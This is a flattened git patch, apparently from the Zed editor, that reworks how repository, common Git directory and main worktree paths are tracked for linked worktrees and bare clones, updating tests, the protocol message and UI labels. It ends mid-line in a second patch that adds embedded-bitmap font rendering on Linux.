a/crates/collab/src/db/tables/project_repository.rs b/crates/collab/src/db/tables/project_repository.rs index 33b20817e61a13..98999acfe81729 100644 --- a/crates/collab/src/db/tables/project_repository.rs +++ b/crates/collab/src/db/tables/project_repository.rs @@ -24,6 +24,8 @@ pub struct Model { pub head_commit_details: Option, pub remote_upstream_url: Option, pub remote_origin_url: Option, + pub repository_dir_abs_path: Option, + pub common_dir_abs_path: Option, // JSON array of linked worktree objects pub linked_worktrees: Option, } diff --git a/crates/collab/tests/integration/git_tests.rs b/crates/collab/tests/integration/git_tests.rs index 8e00325188cc67..d5c5b1e9e7290b 100644 --- a/crates/collab/tests/integration/git_tests.rs +++ b/crates/collab/tests/integration/git_tests.rs @@ -951,11 +951,19 @@ async fn test_linked_worktrees_sync( executor.run_until_parked(); // Verify host now sees 2 linked worktrees (feature-branch and hotfix-branch). - let host_linked_after_removal = project_a.read_with(cx_a, |project, cx| { - let repos = project.repositories(cx); - let repo = repos.values().next().unwrap(); - repo.read(cx).linked_worktrees().to_vec() - }); + let (host_linked_after_removal, host_git_paths_after_removal) = + project_a.read_with(cx_a, |project, cx| { + let repos = project.repositories(cx); + let repo = repos.values().next().unwrap(); + let repo = repo.read(cx); + ( + repo.linked_worktrees().to_vec(), + ( + repo.repository_dir_abs_path.to_path_buf(), + repo.common_dir_abs_path.to_path_buf(), + ), + ) + }); assert_eq!( host_linked_after_removal.len(), 2, @@ -998,6 +1006,19 @@ async fn test_linked_worktrees_sync( late_joiner_linked, host_linked_after_removal, "late-joining client's linked_worktrees should match host's (DB roundtrip)" ); + let late_joiner_git_paths = project_c.read_with(cx_c, |project, cx| { + let repos = project.repositories(cx); + let repo = repos.values().next().unwrap(); + let repo = repo.read(cx); + ( + repo.repository_dir_abs_path.to_path_buf(), + repo.common_dir_abs_path.to_path_buf(), + ) + }); + assert_eq!( + late_joiner_git_paths, host_git_paths_after_removal, + "late-joining client's git directory paths should match host's (DB roundtrip)" + ); // Test reconnection: disconnect client B (guest) and reconnect. // After rejoining, client B should get linked_worktrees back from the DB. @@ -1010,20 +1031,32 @@ async fn test_linked_worktrees_sync( executor.run_until_parked(); // Verify client B still has the correct linked worktrees after reconnection. - let guest_linked_after_reconnect = project_b.read_with(cx_b, |project, cx| { - let repos = project.repositories(cx); - assert_eq!( - repos.len(), - 1, - "guest should still have exactly 1 repository after reconnect" - ); - let repo = repos.values().next().unwrap(); - repo.read(cx).linked_worktrees().to_vec() - }); + let (guest_linked_after_reconnect, guest_git_paths_after_reconnect) = + project_b.read_with(cx_b, |project, cx| { + let repos = project.repositories(cx); + assert_eq!( + repos.len(), + 1, + "guest should still have exactly 1 repository after reconnect" + ); + let repo = repos.values().next().unwrap(); + let repo = repo.read(cx); + ( + repo.linked_worktrees().to_vec(), + ( + repo.repository_dir_abs_path.to_path_buf(), + repo.common_dir_abs_path.to_path_buf(), + ), + ) + }); assert_eq!( guest_linked_after_reconnect, host_linked_after_removal, "guest's linked_worktrees should survive guest disconnect/reconnect" ); + assert_eq!( + guest_git_paths_after_reconnect, host_git_paths_after_removal, + "guest's git directory paths should survive guest disconnect/reconnect" + ); } #[gpui::test] diff --git a/crates/git/src/repository.rs b/crates/git/src/repository.rs index c436ffbf6dfb8d..3e5e14b310b6ae 100644 --- a/crates/git/src/repository.rs +++ b/crates/git/src/repository.rs @@ -349,9 +349,11 @@ impl Worktree { } } -pub fn parse_worktrees_from_str>(raw_worktrees: T) -> Vec { +pub fn parse_worktrees_from_str>( + raw_worktrees: T, + main_worktree_path: Option<&Path>, +) -> Vec { let mut worktrees = Vec::new(); - let mut is_first = true; let normalized = raw_worktrees.as_ref().replace("\r\n", "\n"); let entries = normalized.split("\n\n"); for entry in entries { @@ -379,14 +381,16 @@ pub fn parse_worktrees_from_str>(raw_worktrees: T) -> Vec BoxFuture<'_, Result>> { let git_binary = self.git_binary(); + let main_worktree_path = { + let repo = self.repository.lock(); + let common_dir = repo.commondir().to_path_buf(); + original_repo_path_from_common_dir(&common_dir) + }; self.executor .spawn(async move { let git = git_binary?; @@ -1840,7 +1849,10 @@ impl GitRepository for RealGitRepository { .await?; if output.status.success() { let stdout = String::from_utf8_lossy(&output.stdout); - Ok(parse_worktrees_from_str(&stdout)) + Ok(parse_worktrees_from_str( + &stdout, + main_worktree_path.as_deref(), + )) } else { let stderr = String::from_utf8_lossy(&output.stderr); anyhow::bail!("git worktree list failed: {stderr}"); @@ -4146,12 +4158,12 @@ mod tests { #[test] fn test_parse_worktrees_from_str() { // Empty input - let result = parse_worktrees_from_str(""); + let result = parse_worktrees_from_str("", None); assert!(result.is_empty()); // Single worktree (main) let input = "worktree /home/user/project\nHEAD abc123def\nbranch refs/heads/main\n\n"; - let result = parse_worktrees_from_str(input); + let result = parse_worktrees_from_str(input, Some(Path::new("/home/user/project"))); assert_eq!(result.len(), 1); assert_eq!(result[0].path, PathBuf::from("/home/user/project")); assert_eq!(result[0].sha.as_ref(), "abc123def"); @@ -4160,23 +4172,23 @@ mod tests { assert!(!result[0].is_bare); // Multiple worktrees - let input = "worktree /home/user/project\nHEAD abc123\nbranch refs/heads/main\n\n\ - worktree /home/user/project-wt\nHEAD def456\nbranch refs/heads/feature\n\n"; - let result = parse_worktrees_from_str(input); + let input = "worktree /home/user/project-wt\nHEAD def456\nbranch refs/heads/feature\n\n\ + worktree /home/user/project\nHEAD abc123\nbranch refs/heads/main\n\n"; + let result = parse_worktrees_from_str(input, Some(Path::new("/home/user/project"))); assert_eq!(result.len(), 2); - assert_eq!(result[0].path, PathBuf::from("/home/user/project")); - assert_eq!(result[0].ref_name, Some("refs/heads/main".into())); - assert!(result[0].is_main); + assert_eq!(result[0].path, PathBuf::from("/home/user/project-wt")); + assert_eq!(result[0].ref_name, Some("refs/heads/feature".into())); + assert!(!result[0].is_main); assert!(!result[0].is_bare); - assert_eq!(result[1].path, PathBuf::from("/home/user/project-wt")); - assert_eq!(result[1].ref_name, Some("refs/heads/feature".into())); - assert!(!result[1].is_main); + assert_eq!(result[1].path, PathBuf::from("/home/user/project")); + assert_eq!(result[1].ref_name, Some("refs/heads/main".into())); + assert!(result[1].is_main); assert!(!result[1].is_bare); // Detached HEAD entry (included with ref_name: None) let input = "worktree /home/user/project\nHEAD abc123\nbranch refs/heads/main\n\n\ worktree /home/user/detached\nHEAD def456\ndetached\n\n"; - let result = parse_worktrees_from_str(input); + let result = parse_worktrees_from_str(input, Some(Path::new("/home/user/project"))); assert_eq!(result.len(), 2); assert_eq!(result[0].path, PathBuf::from("/home/user/project")); assert_eq!(result[0].ref_name, Some("refs/heads/main".into())); @@ -4187,14 +4199,14 @@ mod tests { assert!(!result[1].is_main); assert!(!result[1].is_bare); - // Bare repo entry (included with ref_name: None) + // Bare repo entry with no main worktree. let input = "worktree /home/user/bare.git\nHEAD abc123\nbare\n\n\ worktree /home/user/project\nHEAD def456\nbranch refs/heads/main\n\n"; - let result = parse_worktrees_from_str(input); + let result = parse_worktrees_from_str(input, None); assert_eq!(result.len(), 2); assert_eq!(result[0].path, PathBuf::from("/home/user/bare.git")); assert_eq!(result[0].ref_name, None); - assert!(result[0].is_main); + assert!(!result[0].is_main); assert!(result[0].is_bare); assert_eq!(result[1].path, PathBuf::from("/home/user/project")); assert_eq!(result[1].ref_name, Some("refs/heads/main".into())); @@ -4205,7 +4217,7 @@ mod tests { let input = "worktree /home/user/project\nHEAD abc123\nbranch refs/heads/main\n\n\ worktree /home/user/locked-wt\nHEAD def456\nbranch refs/heads/locked-branch\nlocked\n\n\ worktree /home/user/prunable-wt\nHEAD 789aaa\nbranch refs/heads/prunable-branch\nprunable\n\n"; - let result = parse_worktrees_from_str(input); + let result = parse_worktrees_from_str(input, Some(Path::new("/home/user/project"))); assert_eq!(result.len(), 3); assert_eq!(result[0].path, PathBuf::from("/home/user/project")); assert_eq!(result[0].ref_name, Some("refs/heads/main".into())); @@ -4223,7 +4235,7 @@ mod tests { // Leading/trailing whitespace on lines should be tolerated let input = " worktree /home/user/project \n HEAD abc123 \n branch refs/heads/main \n\n"; - let result = parse_worktrees_from_str(input); + let result = parse_worktrees_from_str(input, Some(Path::new("/home/user/project"))); assert_eq!(result.len(), 1); assert_eq!(result[0].path, PathBuf::from("/home/user/project")); assert_eq!(result[0].sha.as_ref(), "abc123"); @@ -4232,7 +4244,7 @@ mod tests { // Windows-style line endings should be handled let input = "worktree /home/user/project\r\nHEAD abc123\r\nbranch refs/heads/main\r\n\r\n"; - let result = parse_worktrees_from_str(input); + let result = parse_worktrees_from_str(input, Some(Path::new("/home/user/project"))); assert_eq!(result.len(), 1); assert_eq!(result[0].path, PathBuf::from("/home/user/project")); assert_eq!(result[0].sha.as_ref(), "abc123"); diff --git a/crates/project/src/git_store.rs b/crates/project/src/git_store.rs index 31ad970d6ead84..8956345c68ef82 100644 --- a/crates/project/src/git_store.rs +++ b/crates/project/src/git_store.rs @@ -301,11 +301,18 @@ pub struct RepositorySnapshot { pub id: RepositoryId, pub statuses_by_path: SumTree, pub work_directory_abs_path: Arc, - /// The working directory of the original repository. For a normal - /// checkout this equals `work_directory_abs_path`. For a git worktree - /// checkout, this is the original repo's working directory — used to - /// anchor new worktree creation so they don't nest. - pub original_repo_abs_path: Arc, + /// Absolute path to the directory holding this worktree's Git state. + /// + /// For a linked worktree this is the worktree-specific directory under the + /// common Git directory, such as `
/.git/worktrees/`. + pub repository_dir_abs_path: Arc, + /// Absolute path to the repository's common Git directory. + /// + /// For a normal checkout this is `/.git`. For a linked + /// worktree this is the common Git directory shared by all worktrees. If + /// that common directory is a bare repository, there may be no main + /// worktree path to derive from it. + pub common_dir_abs_path: Arc, pub path_style: PathStyle, pub branch: Option, pub branch_list: Arc<[Branch]>, @@ -1640,12 +1647,8 @@ impl GitStore { .. } = update { - let original_repo_abs_path: Arc = git::repository::original_repo_path( - work_directory_abs_path, - common_dir_abs_path, - repository_dir_abs_path, - ) - .into(); + let repository_dir_abs_path = repository_dir_abs_path.clone(); + let common_dir_abs_path = common_dir_abs_path.clone(); let id = RepositoryId(next_repository_id.fetch_add(1, atomic::Ordering::Release)); let is_trusted = TrustedWorktrees::try_get_global(cx) .map(|trusted_worktrees| { @@ -1659,7 +1662,8 @@ impl GitStore { let mut repo = Repository::local( id, work_directory_abs_path.clone(), - original_repo_abs_path.clone(), + repository_dir_abs_path.clone(), + common_dir_abs_path.clone(), dot_git_abs_path.clone(), project_environment.downgrade(), fs.clone(), @@ -1902,9 +1906,10 @@ impl GitStore { &self.repositories } - /// Returns the original (main) repository working directory for the given worktree. - /// For normal checkouts this equals the worktree's own path; for linked - /// worktrees it points back to the original repo. + /// Returns the main repository working directory for the given worktree. + /// For normal checkouts this equals the worktree's own path. For linked + /// worktrees it points back to the main worktree, if one exists. Linked + /// worktrees attached to a bare repository have no main worktree path. pub fn original_repo_path_for_worktree( &self, worktree_id: WorktreeId, @@ -1919,7 +1924,12 @@ impl GitStore { .is_some_and(|ids| ids.contains(&worktree_id)) }) .and_then(|repo_id| self.repositories.get(repo_id)) - .map(|repo| repo.read(cx).snapshot().original_repo_abs_path) + .and_then(|repo| { + repo.read(cx) + .snapshot() + .main_worktree_abs_path() + .map(Arc::from) + }) } pub fn status_for_buffer_id(&self, buffer_id: BufferId, cx: &App) -> Option { @@ -2064,8 +2074,12 @@ impl GitStore { let id = RepositoryId::from_proto(update.id); let client = this.upstream_client().context("no upstream client")?; - let original_repo_abs_path: Option> = update - .original_repo_abs_path + let repository_dir_abs_path: Option> = update + .repository_dir_abs_path + .as_deref() + .map(|p| Path::new(p).into()); + let common_dir_abs_path: Option> = update + .common_dir_abs_path .as_deref() .map(|p| Path::new(p).into()); @@ -2076,7 +2090,8 @@ impl GitStore { Repository::remote( id, Path::new(&update.abs_path).into(), - original_repo_abs_path.clone(), + repository_dir_abs_path.clone(), + common_dir_abs_path.clone(), path_style, ProjectId(update.project_id), client, @@ -3926,14 +3941,20 @@ impl RepositorySnapshot { fn empty( id: RepositoryId, work_directory_abs_path: Arc, - original_repo_abs_path: Option>, + repository_dir_abs_path: Option>, + common_dir_abs_path: Option>, path_style: PathStyle, ) -> Self { + let repository_dir_abs_path = + repository_dir_abs_path.unwrap_or_else(|| work_directory_abs_path.join(".git").into()); + let common_dir_abs_path = + common_dir_abs_path.unwrap_or_else(|| repository_dir_abs_path.clone()); + Self { id, statuses_by_path: Default::default(), - original_repo_abs_path: original_repo_abs_path - .unwrap_or_else(|| work_directory_abs_path.clone()), + repository_dir_abs_path, + common_dir_abs_path, work_directory_abs_path, branch: None, branch_list: Arc::from([]), @@ -3980,9 +4001,10 @@ impl RepositorySnapshot { .collect(), remote_upstream_url: self.remote_upstream_url.clone(), remote_origin_url: self.remote_origin_url.clone(), - original_repo_abs_path: Some( - self.original_repo_abs_path.to_string_lossy().into_owned(), + repository_dir_abs_path: Some( + self.repository_dir_abs_path.to_string_lossy().into_owned(), ), + common_dir_abs_path: Some(self.common_dir_abs_path.to_string_lossy().into_owned()), linked_worktrees: self .linked_worktrees .iter() @@ -4062,9 +4084,10 @@ impl RepositorySnapshot { .collect(), remote_upstream_url: self.remote_upstream_url.clone(), remote_origin_url: self.remote_origin_url.clone(), - original_repo_abs_path: Some( - self.original_repo_abs_path.to_string_lossy().into_owned(), + repository_dir_abs_path: Some( + self.repository_dir_abs_path.to_string_lossy().into_owned(), ), + common_dir_abs_path: Some(self.common_dir_abs_path.to_string_lossy().into_owned()), linked_worktrees: self .linked_worktrees .iter() @@ -4073,6 +4096,23 @@ impl RepositorySnapshot { } } + /// Returns the main worktree path for this repository, if one exists. + /// + /// Linked worktrees attached to bare repositories do not have a main + /// worktree. For linked worktrees attached to a non-bare repository, the + /// common Git directory is the main worktree's `.git` directory. + pub fn main_worktree_abs_path(&self) -> Option<&Path> { + if self.is_linked_worktree() { + if self.common_dir_abs_path.file_name()? == std::ffi::OsStr::new(".git") { + self.common_dir_abs_path.parent() + } else { + None + } + } else { + Some(self.work_directory_abs_path.as_ref()) + } + } + /// The main worktree is the original checkout that other worktrees were /// created from. /// @@ -4081,7 +4121,7 @@ impl RepositorySnapshot { /// /// Submodules also return `true` here, since they are not linked worktrees. pub fn is_main_worktree(&self) -> bool { - self.work_directory_abs_path == self.original_repo_abs_path + !self.is_linked_worktree() } /// Returns true if this repository is a linked worktree, that is, one that @@ -4089,7 +4129,7 @@ impl RepositorySnapshot { /// /// Returns `false` for both the main worktree and submodules. pub fn is_linked_worktree(&self) -> bool { - !self.is_main_worktree() + self.repository_dir_abs_path != self.common_dir_abs_path } pub fn linked_worktrees(&self) -> &[GitWorktree] { @@ -4266,7 +4306,8 @@ impl Repository { fn local( id: RepositoryId, work_directory_abs_path: Arc, - original_repo_abs_path: Arc, + repository_dir_abs_path: Arc, + common_dir_abs_path: Arc, dot_git_abs_path: Arc, project_environment: WeakEntity, fs: Arc, @@ -4277,7 +4318,8 @@ impl Repository { let snapshot = RepositorySnapshot::empty( id, work_directory_abs_path.clone(), - Some(original_repo_abs_path), + Some(repository_dir_abs_path), + Some(common_dir_abs_path), PathStyle::local(), ); let refetch_repo_state = Arc::new(move |cx: &mut Context| { @@ -4353,7 +4395,8 @@ impl Repository { fn remote( id: RepositoryId, work_directory_abs_path: Arc, - original_repo_abs_path: Option>, + repository_dir_abs_path: Option>, + common_dir_abs_path: Option>, path_style: PathStyle, project_id: ProjectId, client: AnyProtoClient, @@ -4363,7 +4406,8 @@ impl Repository { let snapshot = RepositorySnapshot::empty( id, work_directory_abs_path, - original_repo_abs_path, + repository_dir_abs_path, + common_dir_abs_path, path_style, ); let refetch_repo_state = Arc::new(move |cx: &mut Context| { @@ -6468,15 +6512,13 @@ impl Repository { } /// If this is a linked worktree (*NOT* the main checkout of a repository), - /// returns the pathed for the linked worktree. + /// returns the path for the linked worktree. /// /// Returns None if this is the main checkout. pub fn linked_worktree_path(&self) -> Option<&Arc> { - if self.work_directory_abs_path != self.original_repo_abs_path { - Some(&self.work_directory_abs_path) - } else { - None - } + self.snapshot + .is_linked_worktree() + .then_some(&self.work_directory_abs_path) } pub fn path_for_new_linked_worktree( @@ -6484,11 +6526,15 @@ impl Repository { branch_name: &str, worktree_directory_setting: &str, ) -> Result { - let original_repo = self.original_repo_abs_path.clone(); - let project_name = original_repo + let repository_anchor = self + .snapshot + .main_worktree_abs_path() + .unwrap_or(self.common_dir_abs_path.as_ref()); + let project_name = repository_anchor .file_name() .ok_or_else(|| anyhow!("git repo must have a directory name"))?; - let directory = worktrees_directory_for_repo(&original_repo, worktree_directory_setting)?; + let directory = + worktrees_directory_for_repo(repository_anchor, worktree_directory_setting)?; Ok(directory.join(branch_name).join(project_name)) } @@ -6738,7 +6784,11 @@ impl Repository { pub fn remove_worktree(&mut self, path: PathBuf, force: bool) -> oneshot::Receiver> { let id = self.id; - let original_repo_abs_path = self.snapshot.original_repo_abs_path.clone(); + let repository_anchor_path: Arc = self + .snapshot + .main_worktree_abs_path() + .unwrap_or(self.snapshot.common_dir_abs_path.as_ref()) + .into(); self.send_job( Some(format!("git worktree remove: {}", path.display()).into()), move |repo, cx| async move { @@ -6781,7 +6831,7 @@ impl Repository { let managed_worktree_base = cx.update(|cx| { let setting = &ProjectSettings::get_global(cx).git.worktree_directory; - worktrees_directory_for_repo(&original_repo_abs_path, setting).log_err() + worktrees_directory_for_repo(&repository_anchor_path, setting).log_err() }); if let Some(managed_worktree_base) = managed_worktree_base { @@ -7159,8 +7209,12 @@ impl Repository { update: proto::UpdateRepository, cx: &mut Context, ) -> Result<()> { - if let Some(main_path) = &update.original_repo_abs_path { - self.snapshot.original_repo_abs_path = Path::new(main_path.as_str()).into(); + if let Some(repository_dir_abs_path) = &update.repository_dir_abs_path { + self.snapshot.repository_dir_abs_path = + Path::new(repository_dir_abs_path.as_str()).into(); + } + if let Some(common_dir_abs_path) = &update.common_dir_abs_path { + self.snapshot.common_dir_abs_path = Path::new(common_dir_abs_path.as_str()).into(); } let new_branch = update.branch_summary.as_ref().map(proto_to_branch); @@ -7793,7 +7847,7 @@ pub async fn resolve_git_worktree_to_main_repo(fs: &dyn Fs, path: &Path) -> Opti /// /// Returns `Ok(resolved_path)` or an error with a user-facing message. pub fn worktrees_directory_for_repo( - original_repo_abs_path: &Path, + repository_anchor_path: &Path, worktree_directory_setting: &str, ) -> Result { // Check the original setting before trimming, since a path like "///" @@ -7819,25 +7873,25 @@ pub fn worktrees_directory_for_repo( anyhow::bail!("git.worktree_directory must not be \"..\" (use \"../some-name\" instead)"); } - let joined = original_repo_abs_path.join(trimmed); + let joined = repository_anchor_path.join(trimmed); let resolved = util::normalize_path(&joined); - let resolved = if resolved.starts_with(original_repo_abs_path) { + let resolved = if resolved.starts_with(repository_anchor_path) { resolved - } else if let Some(repo_dir_name) = original_repo_abs_path.file_name() { + } else if let Some(repo_dir_name) = repository_anchor_path.file_name() { resolved.join(repo_dir_name) } else { resolved }; - let parent = original_repo_abs_path + let parent = repository_anchor_path .parent() - .unwrap_or(original_repo_abs_path); + .unwrap_or(repository_anchor_path); if !resolved.starts_with(parent) { anyhow::bail!( "git.worktree_directory resolved to {resolved:?}, which is outside \ the project root and its parent directory. It must resolve to a \ - subdirectory of {original_repo_abs_path:?} or a sibling of it." + subdirectory of {repository_anchor_path:?} or a sibling of it." ); } @@ -7884,6 +7938,29 @@ async fn remove_empty_managed_worktree_ancestors(fs: &dyn Fs, child_path: &Path, } } +/// Returns the repository's identity path given its common Git directory. +/// +/// This is the canonical, on-disk path used for project grouping and as the +/// basis for display names. The goal is to return the directory the user +/// thinks of as "the project": +/// +/// - If `common_dir`'s last component starts with `.` (e.g. `.git` for a +/// normal checkout, or `.bare` for a bare clone), the parent directory is +/// returned. Both of these are internal Git directories; the parent is the +/// meaningful project root. +/// - Otherwise (e.g. `zed.git` for a bare clone), `common_dir` itself is +/// returned — it is already a meaningful on-disk path. +pub fn repo_identity_path(common_dir: &Path) -> &Path { + let is_dot_entry = common_dir + .file_name() + .is_some_and(|n| n.to_string_lossy().starts_with('.')); + if is_dot_entry { + common_dir.parent().unwrap_or(common_dir) + } else { + common_dir + } +} + /// Returns a short name for a linked worktree suitable for UI display /// /// Uses the main worktree path to come up with a short name that disambiguates diff --git a/crates/project/src/project.rs b/crates/project/src/project.rs index af15ab445175e5..7cb51d4ef8a41c 100644 --- a/crates/project/src/project.rs +++ b/crates/project/src/project.rs @@ -49,7 +49,7 @@ pub use agent_server_store::{AgentId, AgentServerStore, AgentServersUpdated, Ext pub use git_store::{ ConflictRegion, ConflictSet, ConflictSetSnapshot, ConflictSetUpdate, git_traversal::{ChildEntriesGitIter, GitEntry, GitEntryRef, GitTraversal}, - linked_worktree_short_name, worktrees_directory_for_repo, + linked_worktree_short_name, repo_identity_path, worktrees_directory_for_repo, }; pub use manifest_tree::ManifestTree; pub use project_search::{Search, SearchResults}; @@ -6204,7 +6204,14 @@ impl ProjectGroupKey { let mut names = Vec::with_capacity(self.paths.paths().len()); for abs_path in self.paths.ordered_paths() { let detail = path_detail_map.get(abs_path).copied().unwrap_or(0); - let suffix = path_suffix(abs_path, detail); + // Strip a `.git` extension for display (bare clones like `foo.git` + // should display as `foo`, matching the titlebar). + let display_path = if abs_path.extension() == Some(std::ffi::OsStr::new("git")) { + std::borrow::Cow::Owned(abs_path.with_extension("")) + } else { + std::borrow::Cow::Borrowed(abs_path.as_path()) + }; + let suffix = path_suffix(&display_path, detail); if !suffix.is_empty() { names.push(suffix); } diff --git a/crates/project/src/worktree_store.rs b/crates/project/src/worktree_store.rs index 8eaf3f40c0a7b7..c6abb6e1743540 100644 --- a/crates/project/src/worktree_store.rs +++ b/crates/project/src/worktree_store.rs @@ -1369,7 +1369,7 @@ impl WorktreeStore { let folder_path = snapshot.abs_path().to_path_buf(); let main_path = snapshot .root_repo_common_dir() - .and_then(|dir| Some(dir.parent()?.to_path_buf())) + .map(|dir| crate::git_store::repo_identity_path(dir).to_path_buf()) .unwrap_or_else(|| folder_path.clone()); (main_path, folder_path) }) diff --git a/crates/project/tests/integration/git_store.rs b/crates/project/tests/integration/git_store.rs index 766e41b100dc8b..2aaeb901d54b5b 100644 --- a/crates/project/tests/integration/git_store.rs +++ b/crates/project/tests/integration/git_store.rs @@ -1609,7 +1609,10 @@ mod trust_tests { mod resolve_worktree_tests { use fs::FakeFs; use gpui::TestAppContext; - use project::{git_store::resolve_git_worktree_to_main_repo, linked_worktree_short_name}; + use project::{ + git_store::resolve_git_worktree_to_main_repo, linked_worktree_short_name, + repo_identity_path, + }; use serde_json::json; use std::path::{Path, PathBuf}; @@ -1687,6 +1690,27 @@ mod resolve_worktree_tests { assert_eq!(result, None); } + #[test] + fn test_repo_identity_path() { + let examples = [ + // Normal checkout: `.git` starts with `.`, so parent is the worktree + ("/home/bob/zed/.git", "/home/bob/zed"), + // Bare clone named `.bare`: starts with `.`, so parent is the project dir + ("/repos/project/.bare", "/repos/project"), + // Bare clone with `.git` extension: does not start with `.`, kept as-is + ("/repos/zed.git", "/repos/zed.git"), + // Bare clone with arbitrary plain name: kept as-is + ("/repos/project", "/repos/project"), + ]; + for (common_dir, expected) in examples { + assert_eq!( + repo_identity_path(Path::new(common_dir)), + Path::new(expected), + "identity path for common_dir {common_dir:?} should be {expected:?}" + ); + } + } + #[test] fn test_linked_worktree_short_name() { let examples = [ diff --git a/crates/project/tests/integration/project_tests.rs b/crates/project/tests/integration/project_tests.rs index c512c893cc4551..0fbec6c1a1d4ea 100644 --- a/crates/project/tests/integration/project_tests.rs +++ b/crates/project/tests/integration/project_tests.rs @@ -12068,8 +12068,8 @@ async fn test_git_worktrees_and_submodules(cx: &mut gpui::TestAppContext) { Path::new(path!("/project/some-worktree")).into(), ); pretty_assertions::assert_eq!( - repo.read(cx).original_repo_abs_path, - Path::new(path!("/project")).into(), + repo.read(cx).main_worktree_abs_path(), + Some(Path::new(path!("/project"))), ); assert!( repo.read(cx).linked_worktree_path().is_some(), @@ -12121,8 +12121,8 @@ async fn test_git_worktrees_and_submodules(cx: &mut gpui::TestAppContext) { Path::new(path!("/project/subdir/some-submodule")).into(), ); pretty_assertions::assert_eq!( - repo.read(cx).original_repo_abs_path, - Path::new(path!("/project/subdir/some-submodule")).into(), + repo.read(cx).main_worktree_abs_path(), + Some(Path::new(path!("/project/subdir/some-submodule"))), ); assert!( repo.read(cx).linked_worktree_path().is_none(), diff --git a/crates/proto/proto/git.proto b/crates/proto/proto/git.proto index 3c0db6b1a638e9..9d583a166c95f7 100644 --- a/crates/proto/proto/git.proto +++ b/crates/proto/proto/git.proto @@ -125,9 +125,11 @@ message UpdateRepository { repeated StashEntry stash_entries = 13; optional string remote_upstream_url = 14; optional string remote_origin_url = 15; - optional string original_repo_abs_path = 16; + reserved 16; repeated Worktree linked_worktrees = 17; repeated Branch branch_list = 18; + optional string repository_dir_abs_path = 19; + optional string common_dir_abs_path = 20; } message RemoveRepository { diff --git a/crates/sidebar/src/sidebar.rs b/crates/sidebar/src/sidebar.rs index 12df8a7f1cba14..57b7c9b2cbb238 100644 --- a/crates/sidebar/src/sidebar.rs +++ b/crates/sidebar/src/sidebar.rs @@ -383,11 +383,12 @@ fn workspace_menu_worktree_labels( if let Some(snapshot) = repository_snapshot { let worktree_name = if snapshot.is_linked_worktree() { - project::linked_worktree_short_name( - snapshot.original_repo_abs_path.as_ref(), - root_path, - ) - .unwrap_or_else(|| folder_name.clone()) + snapshot + .main_worktree_abs_path() + .and_then(|main_worktree_path| { + project::linked_worktree_short_name(main_worktree_path, root_path) + }) + .unwrap_or_else(|| folder_name.clone()) } else { "main".into() }; @@ -5246,7 +5247,7 @@ fn dump_single_workspace(workspace: &Workspace, output: &mut String, cx: &gpui:: .find(|snapshot| abs_path.starts_with(&*snapshot.work_directory_abs_path)); let is_linked = repo_info.map(|s| s.is_linked_worktree()).unwrap_or(false); - let original_repo_path = repo_info.map(|s| &s.original_repo_abs_path); + let main_worktree_path = repo_info.and_then(|s| s.main_worktree_abs_path()); let branch = repo_info.and_then(|s| s.branch.as_ref().map(|b| b.ref_name.clone())); write!(output, " - {}", abs_path.display()).ok(); @@ -5257,8 +5258,13 @@ fn dump_single_workspace(workspace: &Workspace, output: &mut String, cx: &gpui:: write!(output, " [branch: {branch}]").ok(); } if is_linked { - if let Some(original) = original_repo_path { - write!(output, " [linked worktree -> {}]", original.display()).ok(); + if let Some(main_worktree_path) = main_worktree_path { + write!( + output, + " [linked worktree -> {}]", + main_worktree_path.display() + ) + .ok(); } else { write!(output, " [linked worktree]").ok(); } diff --git a/crates/sidebar/src/sidebar_tests.rs b/crates/sidebar/src/sidebar_tests.rs index b2f9e6ac1ae442..3747a7a4d3940d 100644 --- a/crates/sidebar/src/sidebar_tests.rs +++ b/crates/sidebar/src/sidebar_tests.rs @@ -9692,8 +9692,10 @@ mod property_test { for workspace in group_workspaces { for snapshot in root_repository_snapshots(workspace, cx) { - let repo_path_list = - PathList::new(&[snapshot.original_repo_abs_path.to_path_buf()]); + let Some(main_worktree_abs_path) = snapshot.main_worktree_abs_path() else { + continue; + }; + let repo_path_list = PathList::new(&[main_worktree_abs_path.to_path_buf()]); if repo_path_list != path_list { continue; } diff --git a/crates/title_bar/src/title_bar.rs b/crates/title_bar/src/title_bar.rs index 988c8a7c6f492e..02a0c1bcf78129 100644 --- a/crates/title_bar/src/title_bar.rs +++ b/crates/title_bar/src/title_bar.rs @@ -14,7 +14,7 @@ pub use platform_title_bar::{ self, DraggedWindowTab, MergeAllWindows, MoveTabToNewWindow, PlatformTitleBar, ShowNextWindowTab, ShowPreviousWindowTab, }; -use project::linked_worktree_short_name; +use project::{linked_worktree_short_name, repo_identity_path}; #[cfg(not(target_os = "macos"))] use crate::application_menu::{ @@ -197,16 +197,27 @@ impl Render for TitleBar { .map(|name| SharedString::from(name.to_string())); if let Some(repo) = &repository { let repo = repo.read(cx); - linked_worktree_name = linked_worktree_short_name( - repo.original_repo_abs_path.as_ref(), - repo.work_directory_abs_path.as_ref(), - ); - if let Some(name) = repo - .original_repo_abs_path - .file_name() - .and_then(|name| name.to_str()) - { - project_name = Some(SharedString::from(name.to_string())); + linked_worktree_name = repo + .main_worktree_abs_path() + .and_then(|main_worktree_path| { + linked_worktree_short_name( + main_worktree_path, + repo.work_directory_abs_path.as_ref(), + ) + }) + .or_else(|| { + repo.is_linked_worktree() + .then_some(project_name.clone()) + .flatten() + }); + let identity = repo_identity_path(&repo.common_dir_abs_path); + let display_name = if identity.extension() == Some(std::ffi::OsStr::new("git")) { + identity.file_stem() + } else { + identity.file_name() + }; + if let Some(name) = display_name.and_then(|n| n.to_str()) { + project_name = Some(name.into()); } } } From b7aad957cf71b3cfeeb859d198b4cf0b4f5f62f2 Mon Sep 17 00:00:00 2001 From: John Tur Date: Wed, 29 Apr 2026 15:23:13 +0200 Subject: [PATCH 109/231] Use embedded bitmaps in fonts on Linux (#55202) Release Notes: - Added support for using embedded bitmaps in fonts on Linux --- crates/gpui_wgpu/src/cosmic_text_system.rs | 12 ++++++++++-- 1 file changed, 10 insertions(+), 2 deletions(-) diff --git a/crates/gpui_wgpu/src/cosmic_text_system.rs b/crates/gpui_wgpu/src/cosmic_text_system.rs index c664ca9449ff21..24fa7172c3ab3f 100644 --- a/crates/gpui_wgpu/src/cosmic_text_system.rs +++ b/crates/gpui_wgpu/src/cosmic_text_system.rs @@ -302,7 +302,15 @@ impl CosmicTextSystemState { } Ok((bitmap_size, image.data)) } - swash::scale::image::Content::Mask => Ok((bitmap_size, image.data)), + swash::scale::image::Content::Mask => { + if params.subpixel_rendering { + // We must always return RGBA data when subpixel rendering is requested. + let expanded = image.data.iter().flat_map(|&a| [a, a, a, a]).collect(); + Ok((bitmap_size, expanded)) + } else { + Ok((bitmap_size, 